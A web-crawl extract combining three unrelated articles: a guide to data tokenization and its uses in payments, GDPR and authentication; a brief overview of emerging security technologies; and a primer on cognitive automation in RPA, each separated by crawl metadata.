Tokenization has become a popular buzzword in the world of data security, as it can be applied to a wide range of industries and use cases. If your company stores and processes sensitive data, you need to understand how tokenization works. This guide will explain everything you need to know.
What is Tokenization Anyway?
Tokenization is the process of turning sensitive data into non-sensitive data. The sensitive data gets turned into “tokens” that retain all of the information without compromising its security.
In theory, tokenization can be applied to any type of sensitive data. This data security practice is most commonly associated with credit card processing, but it can also be used to secure medical records, bank transactions, loan applications, stock market trading, criminal records, social security numbers, and more.
Tokens have no real value on their own. They simply replace sensitive data while still allowing the data to serve its purpose.
Casino chips are a great analogy. People at a casino can play poker, blackjack, or other table games using chips that represent real money. But they can’t use those chips to buy groceries—the cash itself is protected by the token.
How Tokenization Works
In terms of data security, the tokenization process is a bit more complex. Tokens can be generated in the following ways:
- Mathematically cryptographic function with a key that’s reversible
- Nonreversible functions (like a hash function)
- A randomly generated number or an index function
Once the tokenization process has been completed, the tokens represent a safe way to use the data—tokens are nonsensitive. The sensitive data is stored in a centralized server called a “token vault.” Token vaults are the only way to map sensitive data back to corresponding tokens.
For reversible tokens, the data is not typically stored in a vault. Instead, vaultless tokenization keeps the sensitive secure with an algorithm.
The terms tokenization and encryption are commonly associated with each other, although the two data security methods are not the same.
Encryption uses an algorithm to transform information into a non-readable format. To access the encrypted data, you need to have an encryption key.
The purpose of encryption is to protect sensitive information from anyone for whom the data is not intended. Even if someone were to access the encrypted data, they would have no way to decipher it without a key.
Tokens are just a placeholder for sensitive data (remember, think casino chips). The actual data associated with that token is stored elsewhere. If a hacker steals the tokens, they have no value—the data doesn’t reside in the same environment as the token.
To truly understand tokenization, you must also get familiar with the term “detokenization.”
As the name implies, detokenization is the reverse process that exchanges the token for its original value. The only way to perform detokenization is through the original tokenization system—there’s no other way to retrieve the original data using just the token.
Tokens work well for one-time uses, like payment transactions, that don’t need to be stored beyond their initial use. But they also work well for high-value items, such as keeping a credit card on file for recurring transactions.
Tokenization ultimately keeps sensitive data safe from both internal and external threats. In many instances, tokenization can be used as a way to stay compliant with regulations like PCI DSS, GDPR, HIPAA, and more.
Let’s take a close look at some real-world examples of tokenization in use:
Example #1: Credit Card Processing
The most common use case for tokenization is credit card processing. Businesses that process credit cards must remain PCI compliant. Otherwise, they can be hit with hefty fines or lose the right to process credit cards altogether.
According to PCI standards, credit card numbers can’t be stored within a POS system or a database after a transaction.
In this scenario, businesses can use a payment service provider that takes the card information and turns it into a token. Since the tokens themselves don’t actually contain the cardholder data, they are useless to anyone with malicious intent.
Employees, hackers, or cybercriminals attempting to steal credit card numbers won’t have any luck if they get their hands on tokens.
With credit card processing, it’s common for the tokens to be kept in a preserved format. For example, the number of characters in the token will be identical to the card number, and the last four digits of the card will be visible.
This format is useful for general business operations. A customer may ask an employee what card they have on file, and the employee could give an appropriate answer like “Visa ending in 6789.”
In addition to the storage of credit cards, tokenization is also used to validate card transactions.
When a credit card gets swiped or entered into an ecommerce site, a lot goes on behind the scenes. The card data passes through the credit card processor, acquiring bank, card network, and issuing bank before ultimately getting sent back to the merchant with an “approve” or “deny” message.
But the card number itself isn’t used as the information changes hands—the number is turned into a token. Once the token reaches the card network, they check the token vault to verify the account number before sending the token back down the line.
All of this happens in a matter of seconds and keeps the sensitive cardholder data secure as the transaction gets processed.
Example #2: Blockchain
Blockchain has been a hot topic since the explosion of cryptocurrency, although the concept of blockchain dates back decades before crypto was invented.
With blockchain, tokens become a digital representation of real-world assets. These are known as security tokens or asset tokens.
For centralized economic models, banks and financial institutions are responsible for managing the integrity of the transaction ledger. But for decentralized scenarios, like cryptocurrency, the responsibility shifts to the individual users involved with the transaction.
Tokens in a blockchain are linked back to the real-world asset. Each transaction, or block in the chain, is dependent on other transactions in the chain for verification.
Any tokenized asset in a blockchain can be traced back to the asset that it represents while keeping the data associated with that asset secure.
Example #3: Customer Data Storage Compliance
Laws and industry-specific regulations are tightening in various jurisdictions. Two common examples include HIPAA (Health Insurance Portability and Accountability Act) and GDPR (General Data Protection Regulation).
HIPAA defines how patient records must be stored and shared in the healthcare space, and GDPR is for consumer data protection in the European Union.
Let’s take a closer look at GDPR and how tokenization can be used here for compliance. Just know that the same concept can be applied to any regulation or data security practice with similar information.
The GDPR requires businesses to remove all personal identifiers associated with the customer data that they’re storing. For example, a person’s name, phone number, or address can’t be stored with their transaction history.
To remain compliant, organizations must put that data through a process called pseudonymization. Tokenization is one way to accomplish pseudonymization, as it takes the personal identifiers of consumer data and turns them into tokens.
Example #4: User Authentication
Tokens can also be used to verify the identity of users, adding an extra layer of security to access sensitive information.
For websites and applications that require a username and password, one-time tokens can be generated and stored in the browser. This provides the user access to other pages on the domain for a specified period of time without needing to re-authenticate themselves on every page.
Once the session is over, the token is destroyed. So the account remains secure.
- Accessing an account from a single-use text or email code
- Logging into a third-party website using Gmail credentials
- Unlocking a smartphone or app with a fingerprint
These are all common examples of token-based authentication that we’ve all seen on a regular basis.
Example #5: Physical Asset Exchange
Art tokenization is a really unique example, but I wanted to include it to showcase the versatility of tokens. Here’s how it works.
An organization that owns a rare or valuable piece of artwork can have the work appraised to set its value. Based on this value, the artwork can be converted into digital tokens for sale on the open market.
Buyers can purchase these tokens to create a portfolio of fractional art shares and sell those tokens for profit.
Alone, the tokens hold no real value. But when authenticated through the platform managing the artwork, the token represents a fractional share of a physical asset.
JPMorgan has used this same concept to tokenize gold bars.
How to Get Started With Tokenization
Now that you understand how tokenization works, it’s time to apply this concept to your specific use case. Here are the tactical steps required to get started with tokenization:
Step 1: Identify What You Need to Secure
What are you trying to tokenize? This must be clearly defined before you continue.
As you’ve seen from the examples above, there are seemingly endless physical and digital assets that can be applied to tokenization.
Most businesses getting started with tokenization are usually trying to protect sensitive consumer data or payment transactions. You could also use tokenization to secure sensitive company data, like payroll information or employee records.
Step 2: Choose a Token Generation Method
Based on the information you’re trying to protect, you need to decide how your tokens will be generated.
First, choose between single-use tokens and multi-use tokens. Single-use tokens work well for things like one-time transactions or user authentication. Multi-use tokens would be required for long-term storage—like keeping credit card data on file or storing personal customer data.
Once you’ve narrowed this down, you need to decide how the tokens will be generated.
Are you going to use a mathematically reversible cryptographic function and key? What about a hash function that’s non-reversible? Or do you want a randomly generated number?
Step 3: Select a Tokenization Provider
Now that you have a firm grasp of your needs, you’ll need a tokenization provider to make all of this happen for you. Most tokenization providers offer a wide range of options, but you need to verify that the solution you’re using fits the criteria identified in steps one and two.
Depending on the use case, choosing a provider will be fairly easy.
For example, payment processors will offer tokenization to your business if you want to start accepting credit cards. They’ll provide you with all of the hardware and technology required to process the cards, and the tokens will be generated and processed by them on the backend.
If you’re using tokenization to authenticate users or protect sensitive business data, then you’d need to use another data security solution. The process here won’t be the same as tokenization for payment processing.
Step 4: Pick a Storage Environment
With tokenization, you need to store two different things. First, you need a place to store the tokens. But you also need a place to store the original and sensitive data.
These two cannot be stored in the same place. So if someone steals the tokens, they can’t do anything with them.
If you’re going to host the tokens in-house, you need to make sure that your environment supports this. In many cases, it’s better to just use the storage system that’s set up by your tokenization provider. They should already have the infrastructure in place to handle everything you need.
You’ll also need to decide between using a token vault or vaultless storage.
Step 5: Understand Detokenization
In many instances, tokenization is not permanent. You can ultimately exchange the token for the original sensitive data.
But this process can only occur through the platform you’re using to generate the tokens.
Let’s stick with the credit card processing example, as this is the most common use case for tokenization. If you’re keeping customer cards on file for recurring billing or faster checkouts, each time that person makes a transaction, the token must be authenticated before the payment can be processed.
|
<urn:uuid:390e7cc6-7eb6-4fbb-8191-6cd6bd4163c7>
|
CC-MAIN-2022-40
|
https://nira.com/tokenization/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00258.warc.gz
|
en
| 0.910415 | 2,614 | 3.53125 | 4 |
Hacker attacks are increasing worldwide dramatically. A fast race for supremacy in this disastrous battle has broken out between data protectionists and data thieves. You can download security technology videos on https://keepv.id.
Five future-oriented security technologies from which IT security teams in companies can benefit
The attacks on important company data are increasing and unfortunately, they are also very effective.
The deficits of passwords and user names are well known. For experts, it is obvious that a more secure form of authentication is necessary. One option would be to transfer validation to the hardware of the user.
Particularly, hardware authentication is applicable to the Internet of Things, where a network must ensure that what wants to gain access is legitimately granted.
Analysis of user behavior
All types of malicious behavior on a network can be displayed once the username and password of a user have been compromised. This is where User Behavior Analytics comes into play, which uses Big Data Analytics to recognize the abnormal behavior of a user.
Protection against data loss
Technologies such as tokenization and encryption are key to avoiding data loss. This means that you can protect data down not just to the field but subfield level too.
This allows data to be securely moved and used across the extended enterprise. Business processes and analyzes can be carried out on the data in their protected form, which drastically reduces exposure and risk.
Deep learning focuses on abnormal behavior like analyzing user behavior. It covers a range of technologies such as machine learning and AI (artificial intelligence).
These technologies make it possible to look at the numerous entities that exist across this type of industry not only at the micro but macro levels as well. For example, a data center as a unit can behave similarly to a user.
The cloud is not new, of course, but it will have an increasingly transformative impact on security technology in the years to come. At the newest when technologies such as virtualized systems, virtualized security hardware, and virtualized firewalls for everything to do with and intrusion detection are transferred to the cloud.
|
<urn:uuid:a9893f92-25d3-47ad-a795-0f4ad25cb398>
|
CC-MAIN-2022-40
|
https://intypedia.com/security-technologies-for-2020-and-beyond/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00258.warc.gz
|
en
| 0.935147 | 426 | 2.515625 | 3 |
What Is Cognitive Automation? A Primer
Anyone who has been following the Robotic Process Automation (RPA) revolution that is transforming enterprises worldwide has also been hearing about how artificial intelligence (AI) can augment traditional RPA tools to do more than just RPA alone can achieve.
You might even have noticed that some RPA software vendors — Automation Anywhere is one of them — are attempting to be more precise with their language. Rather than call our intelligent software robot (bot) product an AI-based solution, we say it is built around cognitive computing theories.
But is that any clearer? What is cognitive automation? Confusion abounds. Let’s try and dispel some of it.
Deloitte defines cognitive automation as a subset of AI technologies that mimic human behavior: “RPA together with cognitive technologies such as speech recognition and natural language processing automate perceptual and judgment-based tasks once reserved for humans.”
IBM takes that definition and adds to it, defining cognitive computing as differing from AI in how it is used: “In an artificial intelligence system, the system tells a doctor which course of action to take based on its analysis. In cognitive computing, the system provides information to help the doctor decide.”
Combining these two definitions together, you see that cognitive automation is a subset of artificial intelligence — using specific AI techniques that mimic the way the human brain works — to assist humans in making decisions, completing tasks, or meeting goals.
Cognitive automation: AI techniques applied to automate specific business processes
Unlike other types of AI, such as machine learning, or deep learning, cognitive automation solutions imitate the way humans think. This means using technologies such as natural language processing, image processing, pattern recognition, and — most importantly — contextual analyses to make more intuitive leaps, perceptions, and judgments.
Cognitive automation is gaining steam. According to IDC, in 2017, the largest area of AI spending was cognitive applications. This includes applications that automate processes that automatically learn, discover, and make recommendations or predictions. Overall, cognitive software platforms will see investments of nearly $2.5 billion this year. Spending on cognitive-related IT and business services will be more than $3.5 billion and will enjoy a five-year CAGR of nearly 70%.
Also, according to IDC, the cognitive applications that will see the most traction in the coming year are quality management investigation and recommendation systems; diagnosis and treatment systems; automated customer service agents; automated threat intelligence and prevention systems; and fraud analysis, and investigation. These five areas will capture nearly 50% of all cognitive spending.
Another way to think about cognitive automation is that it learns at least in part by association. It takes unstructured data and uses that to build relationships and create indices, tags, annotations, and other metadata. It tries to find similarities between items pertaining to specific business processes — invoices, purchase order numbers, shipping addresses, assets, liabilities, etc. Some of the questions that it uses to build these relationships include:
- Have I seen this before?
- What was done in a similar instance?
- Is it connected to something I have seen before?
- What is the strength of that connection?
- Who/what is involved?
There are a number of advantages to cognitive automation over other types of AI. Among them are the facts that cognitive automation solutions are pre-trained to automate specific business processes and hence need fewer data before they can make an impact; they don’t require help from data scientists and/or IT to build elaborate models. They are designed to be used by business users and be operational in just a few weeks.
The coolest thing is that as new data is added to a cognitive system, the system can make more and more connections. This allows cognitive automation systems to keep learning unsupervised, and constantly adjusting to the new information they are being fed.
|
<urn:uuid:0e19016c-f134-4c4c-9712-a1dd4171df55>
|
CC-MAIN-2022-40
|
https://www.automationanywhere.com/company/blog/product-insights/what-is-cognitive-automation-a-primer
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00458.warc.gz
|
en
| 0.941492 | 803 | 2.671875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.